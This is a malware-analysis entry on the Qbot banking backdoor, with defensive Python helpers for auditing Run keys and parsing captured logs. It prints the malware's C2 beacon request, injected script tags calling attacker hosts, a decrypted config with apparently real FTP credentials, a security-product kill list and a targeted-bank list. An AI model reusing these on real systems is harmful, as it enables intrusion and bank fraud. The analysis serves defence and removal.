Trojan-PSW.Win32.Qbot.dkg
From Total Malware Info
Last edited: 21.5.2011
Backdoor, designed to steal confidential user data. It is a Windows PE EXE file, 331,424 bytes in size. It is packed with PE_Patch as well as an unknown packer; the unpacked file is about 205 KB in size. It is written in C++.
MD5: 8CACA118667B608EB4735AF3B229A546
SHA1: 0B78B4CA846A7F35DC55B13D8AF8767749A97793
Installation
Once launched, the backdoor copies its body to a file:
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe
where <rnd_1> is a random name (for example, "uiouy").
To start the created copy automatically each time the system boots, the backdoor adds the path of its copy to an existing value in the registry branch:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
For example:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] <app name> = ""%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe" /c <old value>"
Also the key is created:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "<rnd_2>" = "%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe"
where <rnd_2> is a random name (for example, "jladjtrq").
If the keys cannot be created in the branch above, the same actions are performed in the branches:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]
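As an added example (not code from the original write-up), the following Python helper checks Run/RunOnce value data for the two shapes described above: an existing value wrapped as "<backdoor path>" /c <old value>, and the standalone <rnd_2> value. It recovers the wrapped original command line so the value can be restored rather than just deleted; the sample Run key contents are constructed.

```python
import re

# Qbot.dkg drops "<rnd_1>\<rnd_1>.exe" under Application Data\Microsoft: the folder
# and the executable share one random name, which is the detail both patterns key on.
QBOT_EXE = r'application data\\microsoft\\(?P<dir>[a-z0-9]+)\\(?P=dir)\.exe'

# Hijacked existing value: "<backdoor path>" /c <old value>
WRAPPED_RE = re.compile(r'^"(?P<path>[^"]*' + QBOT_EXE + r')"\s+/c\s+(?P<old>.*)$', re.I)
# Extra value the backdoor adds: "<rnd_2>" = "<backdoor path>"
PLAIN_RE = re.compile(r'^"?(?P<path>[^"]*' + QBOT_EXE + r')"?\s*$', re.I)


def audit_run_values(values):
    """values: {value name: value data} read from a Run or RunOnce key.

    Returns one finding per suspicious value: 'restore' findings carry the
    original command line that was wrapped, 'delete' findings have no original.
    """
    findings = []
    for name, data in values.items():
        m = WRAPPED_RE.match(data.strip())
        if m:
            findings.append({'name': name, 'action': 'restore',
                             'original': m.group('old'), 'backdoor': m.group('path')})
            continue
        m = PLAIN_RE.match(data.strip())
        if m:
            findings.append({'name': name, 'action': 'delete',
                             'original': None, 'backdoor': m.group('path')})
    return findings


# Constructed sample of a Run key: one wrapped vendor entry, one added entry, one clean entry.
SAMPLE_RUN = {
    'VendorUpdater': '"C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\uiouy\\uiouy.exe" /c "C:\\Program Files\\Vendor\\updater.exe" /quiet',
    'jladjtrq': '"C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\uiouy\\uiouy.exe"',
    'ctfmon': 'C:\\WINDOWS\\system32\\ctfmon.exe',
}

if __name__ == '__main__':
    for finding in audit_run_values(SAMPLE_RUN):
        print(finding)
```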
Then the backdoor extracts the following files from its body:
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll (154784 bytes; detected by Kaspersky Antivirus as "Trojan-Spy.Win32.Banker.qpl")
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll (453 bytes)
where <rnd_3> is the first 4 characters of the name <rnd_1>.
The library "<rnd_1>.dll" implements the main backdoor functionality and is discussed below. The file "<rnd_3>.dll" contains encrypted information that configures the malware's further work. For the analyzed sample, the file contained the following lines:
cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://b***01.in/cgi-bin/ls1.pl
ftphost_1=216.***.214.95:cpanel@silfersystem.com:Pomidoro777:
ftphost_2=72.***.86.119:cpanel@gemini.com.co:Columbus101:
ftphost_3=66.***.30.219:cpanel@falahuddarain.com:Alladin71:
ftphost_4=110.***.45.64:cpanel@karnadya.com.my:Islam1120:
ftphost_5=74.***.215.107:cpanel@incitylocal.com:pieceacake100:
update_conf_ver=904
While running, the backdoor writes generated data, as well as some of the collected information, to the configuration file. For example:
alias__qbot.cb=uiou.dll
alias__qbotinj.exe=uiouy.exe
alias__qbot.dll=uiouy.dll
alias_si.txt=larvsox
home_dir=c:\documents and settings\all users\application data\microsoft\uiouy
irc_my_nick=vwnfjq298080
install_time=21.04.00-16/05/2011
firststart_test=1
The installation date and time (the "install_time" parameter) are then checked. If the backdoor was installed later than "May 5 2011-12:46:11", an update of its components is started. To do this, a connection is established to the host:
bg***t.in
and the following HTTP request is sent:
POST /5 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTbPSI/5.11.3.15590)
Host: bg***t.in
Content-Length: 65
Cache-Control: no-cache

is=3&ec1=0&ec2=0&it=2&b=679&vt=0&ov=<OS version>&n=<value of parameter irc_my_nick>
At the time of writing, the server did not respond.
During installation, the backdoor collects the following information about the system:
- the user name;
- the computer name;
- the value of the registry key:
[HKLM\Software\Microsoft\Windows NT\CurrentVersion] "ProductId"
- the serial number of the system drive;
- a list of the software installed on the infected computer. To do this, it reads the "ProductName" values in the registry branch:
[HKCR\Installer\Products\...]
- the IP address of the infected computer. To determine the IP address, the following resources are queried:
http://www.ipaddressworld.com/
http://www.ip-adress.com
To ensure that only one instance of its process runs on the system, the backdoor creates a unique identifier with the name:
<name of backdoor file>a<user name>
Upon completion of installation, the malware executes a previously created copy:
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe
and deletes its original file. To do this, executable code is injected into the address space of the system process "EXPLORER.EXE"; this code first runs the copy and then runs the system shell "CMD.EXE" with the parameters:
cmd /c ping -n 10 localhost && del "<full path to the original backdoor file>"
At this point the installation process is completed.
The malicious program can be run with the following parameters:
/t – the WM_QUIT message is sent to the window "<rnd_1> <username>" created by the malware, and the malware process is then terminated.
/s – the malware runs as a Windows service.
/i – only the extraction of files is performed:
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll
after which the malware exits.
Payload
Once launched, the backdoor locates in its working directory the library extracted during installation and calls its function named "kIlsasgcbag0a". This installs a hook procedure that tracks messages in the system queue, which allows the trojan to perform the following actions:
- hide the files "<rnd_1>.exe" and "<rnd_1>.dll" in its working directory;
- hide its own working directory;
- hide its own process in Task Manager;
- hide the registry keys created during installation;
- track user activity on the infected computer (keystrokes, file access, network traffic, etc.). The information obtained is recorded in the file:
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll
where <rnd_4> is the first 3 letters of the name <rnd_1>.
Below is part of the log created by the malware when a user tries to log in at "http://www.sovereignbank.com":
t=kb time=[23:46:56-17/5/2011] p=[iexplore.exe] b=[http://www.sovereignbank.com/]
t=u1 time=[23:47:35-17/5/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)]
t=h1 time=[23:47:35-17/5/2011] url=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&refer=/utils/net_banking_logon.asp] data=[done=yes&referback=%2Futils%2Fnet_banking_logon.asp&accountType=personal&state=NY] referer=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&refer=/utils/net_banking_logon.asp] cookie=[ACE-WEBCOOKIE-WWW=R364677618; ASPSESSIONIDQASSQDSD=IEFPNFBBDAFAACFKIHCLOKMF; s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520forms%252520/%252520regional_prefs.asp%2526pidt%253D1%2526oid%253Djavascript%25253AcheckSubmit%252528%252529%25253B%2526ot%253DA%2526oi%253D215; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.1.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)]
t=kb time=[23:48:27-17/5/2011] p=[iexplore.exe] b=[MyUserID]
t=h2 time=[23:48:27-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/rsafso.do] data=[fp_browser=mozilla%2F4.0+%28compatible%3B+msie+6.0%3B+windows+nt+5.1%3B+sv1%29%7C4.0+%28compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%29%7CWin32%7C%3BSP2%3B%7Cx86%7Cru%7C8820&fp_screen=32%7C1920%7C1080%7C1050&fp_software=abk%3D6%2C0%2C2600%2C0%7Cwnt%3D6%2C0%2C2900%2C2180%7Cdht%3D5%2C5000%2C3130%2C0%7Cdhj%3D6%2C0%2C1%2C223%7Cdan%3D6%2C0%2C3%2C531%7Cdsh%3D9%2C0%2C0%2C3250%7Cie5%3D6%2C0%2C2900%2C2180%7Cicw%3D5%2C0%2C2918%2C1900%7Cieh%3D6%2C0%2C2900%2C2180%7Ciee%3D4%2C74%2C9273%2C0%7Cwmp%3D9%2C0%2C0%2C3250%7Cobp%3D6%2C0%2C2900%2C2180%7Coex%3D6%2C0%2C2900%2C2180%7Cnet%3D4%2C4%2C0%2C3400%7Ctks%3D4%2C71%2C1968%2C1%7Cmvm%3D5%2C0%2C5000%2C0&fp_timezone=4&fp_language=lang%3Dru%7Csyslang%3Dru%7Cuserlang%3Dru&fp_java=1&fp_cookie=1&username=MyUserID&x=8&y=8] referer=[https://olb.sovereignbank.com/sovSSA/gitLogonSovbank.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=h2 time=[23:48:32-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/getfso] data=[pmdata=] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=kb time=[23:48:51-17/5/2011] p=[iexplore.exe] b=[MyPassword]
t=h2 time=[23:48:51-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/enrollpwdverf.do] data=[password=MyPassword&x=7&y=9] referer=[https://olb.sovereignbank.com/sovSSA/rsaLogon.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38;
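To turn a recovered log like the one above into a list of what the victim must change, here is an added example (not part of the original write-up) that parses the t=<type> name=[value] record format and reports, per host, which form field names were captured and which hosts saw credential-like fields. The sample log is constructed in the same format with a placeholder host, and its last field is cut off as in the captured excerpt.

```python
import re
from urllib.parse import parse_qs, urlsplit

# A record is "t=<type>" followed by name=[value] fields; types seen in the excerpt are
# kb (keystroke buffer), u1 (user agent) and h1/h2 (HTTP form submissions).
FIELD_RE = re.compile(r'(\w+)=\[([^\]]*)\]')
RECORD_RE = re.compile(r'\bt=(\w+)\s+((?:\w+=\[[^\]]*\]\s*)+)')
SENSITIVE = ('password', 'passwd', 'pass', 'pin', 'username', 'userid', 'user')

def parse_records(log):
    """Split the raw log into dicts; a truncated trailing field is dropped, not an error."""
    records = []
    for m in RECORD_RE.finditer(log):
        rec = {'t': m.group(1)}
        rec.update(FIELD_RE.findall(m.group(2)))
        records.append(rec)
    return records

def exposed_fields(records):
    """Per host, the names of form fields the malware captured (values are not echoed)."""
    exposure = {}
    for rec in records:
        if rec['t'] in ('h1', 'h2') and 'url' in rec:
            host = urlsplit(rec['url']).hostname
            names = parse_qs(rec.get('data', ''), keep_blank_values=True)
            exposure.setdefault(host, set()).update(names)
    return {host: sorted(names) for host, names in exposure.items()}

def hosts_to_rotate(records):
    """Hosts where a credential-like field was submitted: change these passwords first."""
    return sorted(host for host, names in exposed_fields(records).items()
                  if any(n.lower() in SENSITIVE for n in names))

def keystroke_buffers(records):
    """(process, typed text) pairs from kb records, in log order."""
    return [(r['p'], r['b']) for r in records if r['t'] == 'kb']

# Constructed sample in the excerpt's format; the final cookie field is cut off on purpose.
SAMPLE_LOG = (
    "t=kb time=[23:46:56-17/5/2011] p=[iexplore.exe] b=[http://bank.example/] "
    "t=u1 time=[23:47:35-17/5/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)] "
    "t=h1 time=[23:47:35-17/5/2011] url=[http://bank.example/prefs.asp?section=personal] "
    "data=[done=yes&state=NY] referer=[http://bank.example/] cookie=[s_cc=true; sid=ABC123] "
    "t=kb time=[23:48:27-17/5/2011] p=[iexplore.exe] b=[MyUserID] "
    "t=h2 time=[23:48:27-17/5/2011] url=[https://olb.bank.example/logon.do] "
    "data=[fp_cookie=1&username=MyUserID&x=8&y=8] cookie=[sid=ABC123] "
    "t=kb time=[23:48:51-17/5/2011] p=[iexplore.exe] b=[MyPassword] "
    "t=h2 time=[23:48:51-17/5/2011] url=[https://olb.bank.example/pwdverf.do] "
    "data=[password=MyPassword&x=7&y=9] cookie=[sid=ABC123"
)
```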
The library also exports a function named "zupidshc21mnu", which removes the hook.
The backdoor monitors, in a loop, for the launch of the following processes:
iexplore.exe
outlook.exe
firefox.exe
opera.exe
skype.exe
msnmsgr.exe
yahoomessenger.exe
chrome.exe
msmsgs.exe
If such a process is found, the malicious library is injected into its address space.
The library implements functionality that allows it, depending on the commands received from the attacker, to perform the following actions on the infected computer:
- terminate the processes:
msdev.exe
dbgview.exe
mirc.exe
ollydbg.exe
ctfmon.exe
- terminate services and processes running in the system whose names contain the substrings:
webroot. agnitum ahnlab arcabit avast avg avira avp bitdefender bit9 castlecops centralcommand clamav comodo computerassociates cpsecure defender drweb emsisoft esafe .eset etrust ewido fortinet f-prot f-secure gdata grisoft hacksoft hauri ikarus jotti k7computing kaspersky malware mcafee networkassociates nod32 norman norton panda pctools prevx quickheal rising rootkit securecomputing sophos spamhaus spyware sunbelt symantec threatexpert trendmicro virus wilderssecurity windowsupdate
- find and modify files with the extensions:
.inc .php .htm .asp .pl .cfm
- infect web pages on the user's FTP and HTTP servers by adding links to malicious scripts into the pages:
<script src="http://in***ate.info/3"></script>
<script src=http://in***ate.info/3></script>
<script src="http://pr***t.in/3"></script>
<script src=http://pr***t.in/3></script>
- download files from links received from the attacker, saving them in the folder:
%WinDir%\TEMP
- work with files on the specified FTP servers.
- update its components by downloading updates from the attacker's servers.
- control processes and services.
- steal confidential user information when the user accesses resources whose names contain the substrings:
iris.sovereignbank.com /wires/ paylinks.cunet.org securentrycorp.amegybank.com businessbankingcenter.synovus.com businessinternetbanking.synovus.com ocm.suntrust.com cashproonline.bankofamerica.com singlepoint.usbank.com netconnect.bokf.com business-eb.ibanking-services.com cashproonline.bankofamerica.com /cashplus/ ebanking-services.com /cashman/ web-cashplus.com treas-mgt.frostbank.com business-eb.ibanking-services.com treasury.pncbank.com access.jpmorgan.com tssportal.jpmorgan.com ktt.key.com onlineserv/CM premierview.membersunited.org directline4biz.com .webcashmgmt.com tmconnectweb moneymanagergps.com ibc.klikbca.com directpay.wellsfargo.com express.53.com itreasury.regions.com itreasurypr.regions.com cpw-achweb.bankofamerica.com businessaccess.citibank.citigroup.com businessonline.huntington.com /cmserver/ goldleafach.com ub-businessonline.blilk.com iachwellsprod.wellsfargo.com achbatchlisting /achupload commercial3.wachovia.com wc.wachovia.com commercial.wachovia.com wcp.wachovia.com chsec.wellsfargo.com wellsoffice.wellsfargo.com /stbcorp/ /payments/ach trz.tranzact.org /wiret /payments/ach cbs.firstcitizensonline.com /corpach/
- steal passwords stored in the Internet Explorer browser. To do this, the registry keys in the following branch are analyzed:
[HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2]
- steal account information from Outlook Express. To do this, the registry keys in the following branch are analyzed:
[HKCU\Software\Microsoft\Internet Account Manager\Accounts]
- send the information collected on the infected computer to the specified server.
While running, the backdoor connects to the following servers:
re***rver.com.ua
pp***g.in
du**.in
du**.in
yi**.com.ua
cit***omo.info
last***t.co.in
The backdoor stores its connection log in the file:
c:\irclog.txt
Removal instructions
If your computer does not have antivirus software and is infected by this malicious program, follow the instructions below to remove it:
1. Reboot the computer in "Safe Mode" (at the beginning of system boot, press and hold F8, then select "Safe Mode" in the Windows boot menu).
2. Delete the registry keys created by the backdoor and restore the original values of the modified keys in the system registry:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]
3. Delete files:
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll
c:\irclog.txt
4. Delete the downloaded files in the folder:
%WinDir%\TEMP
5. Clear the Temporary Internet Files directory, which may contain infected files.
6. Change the authentication data for the compromised resources.
7. Perform a full system scan with an antivirus with updated databases.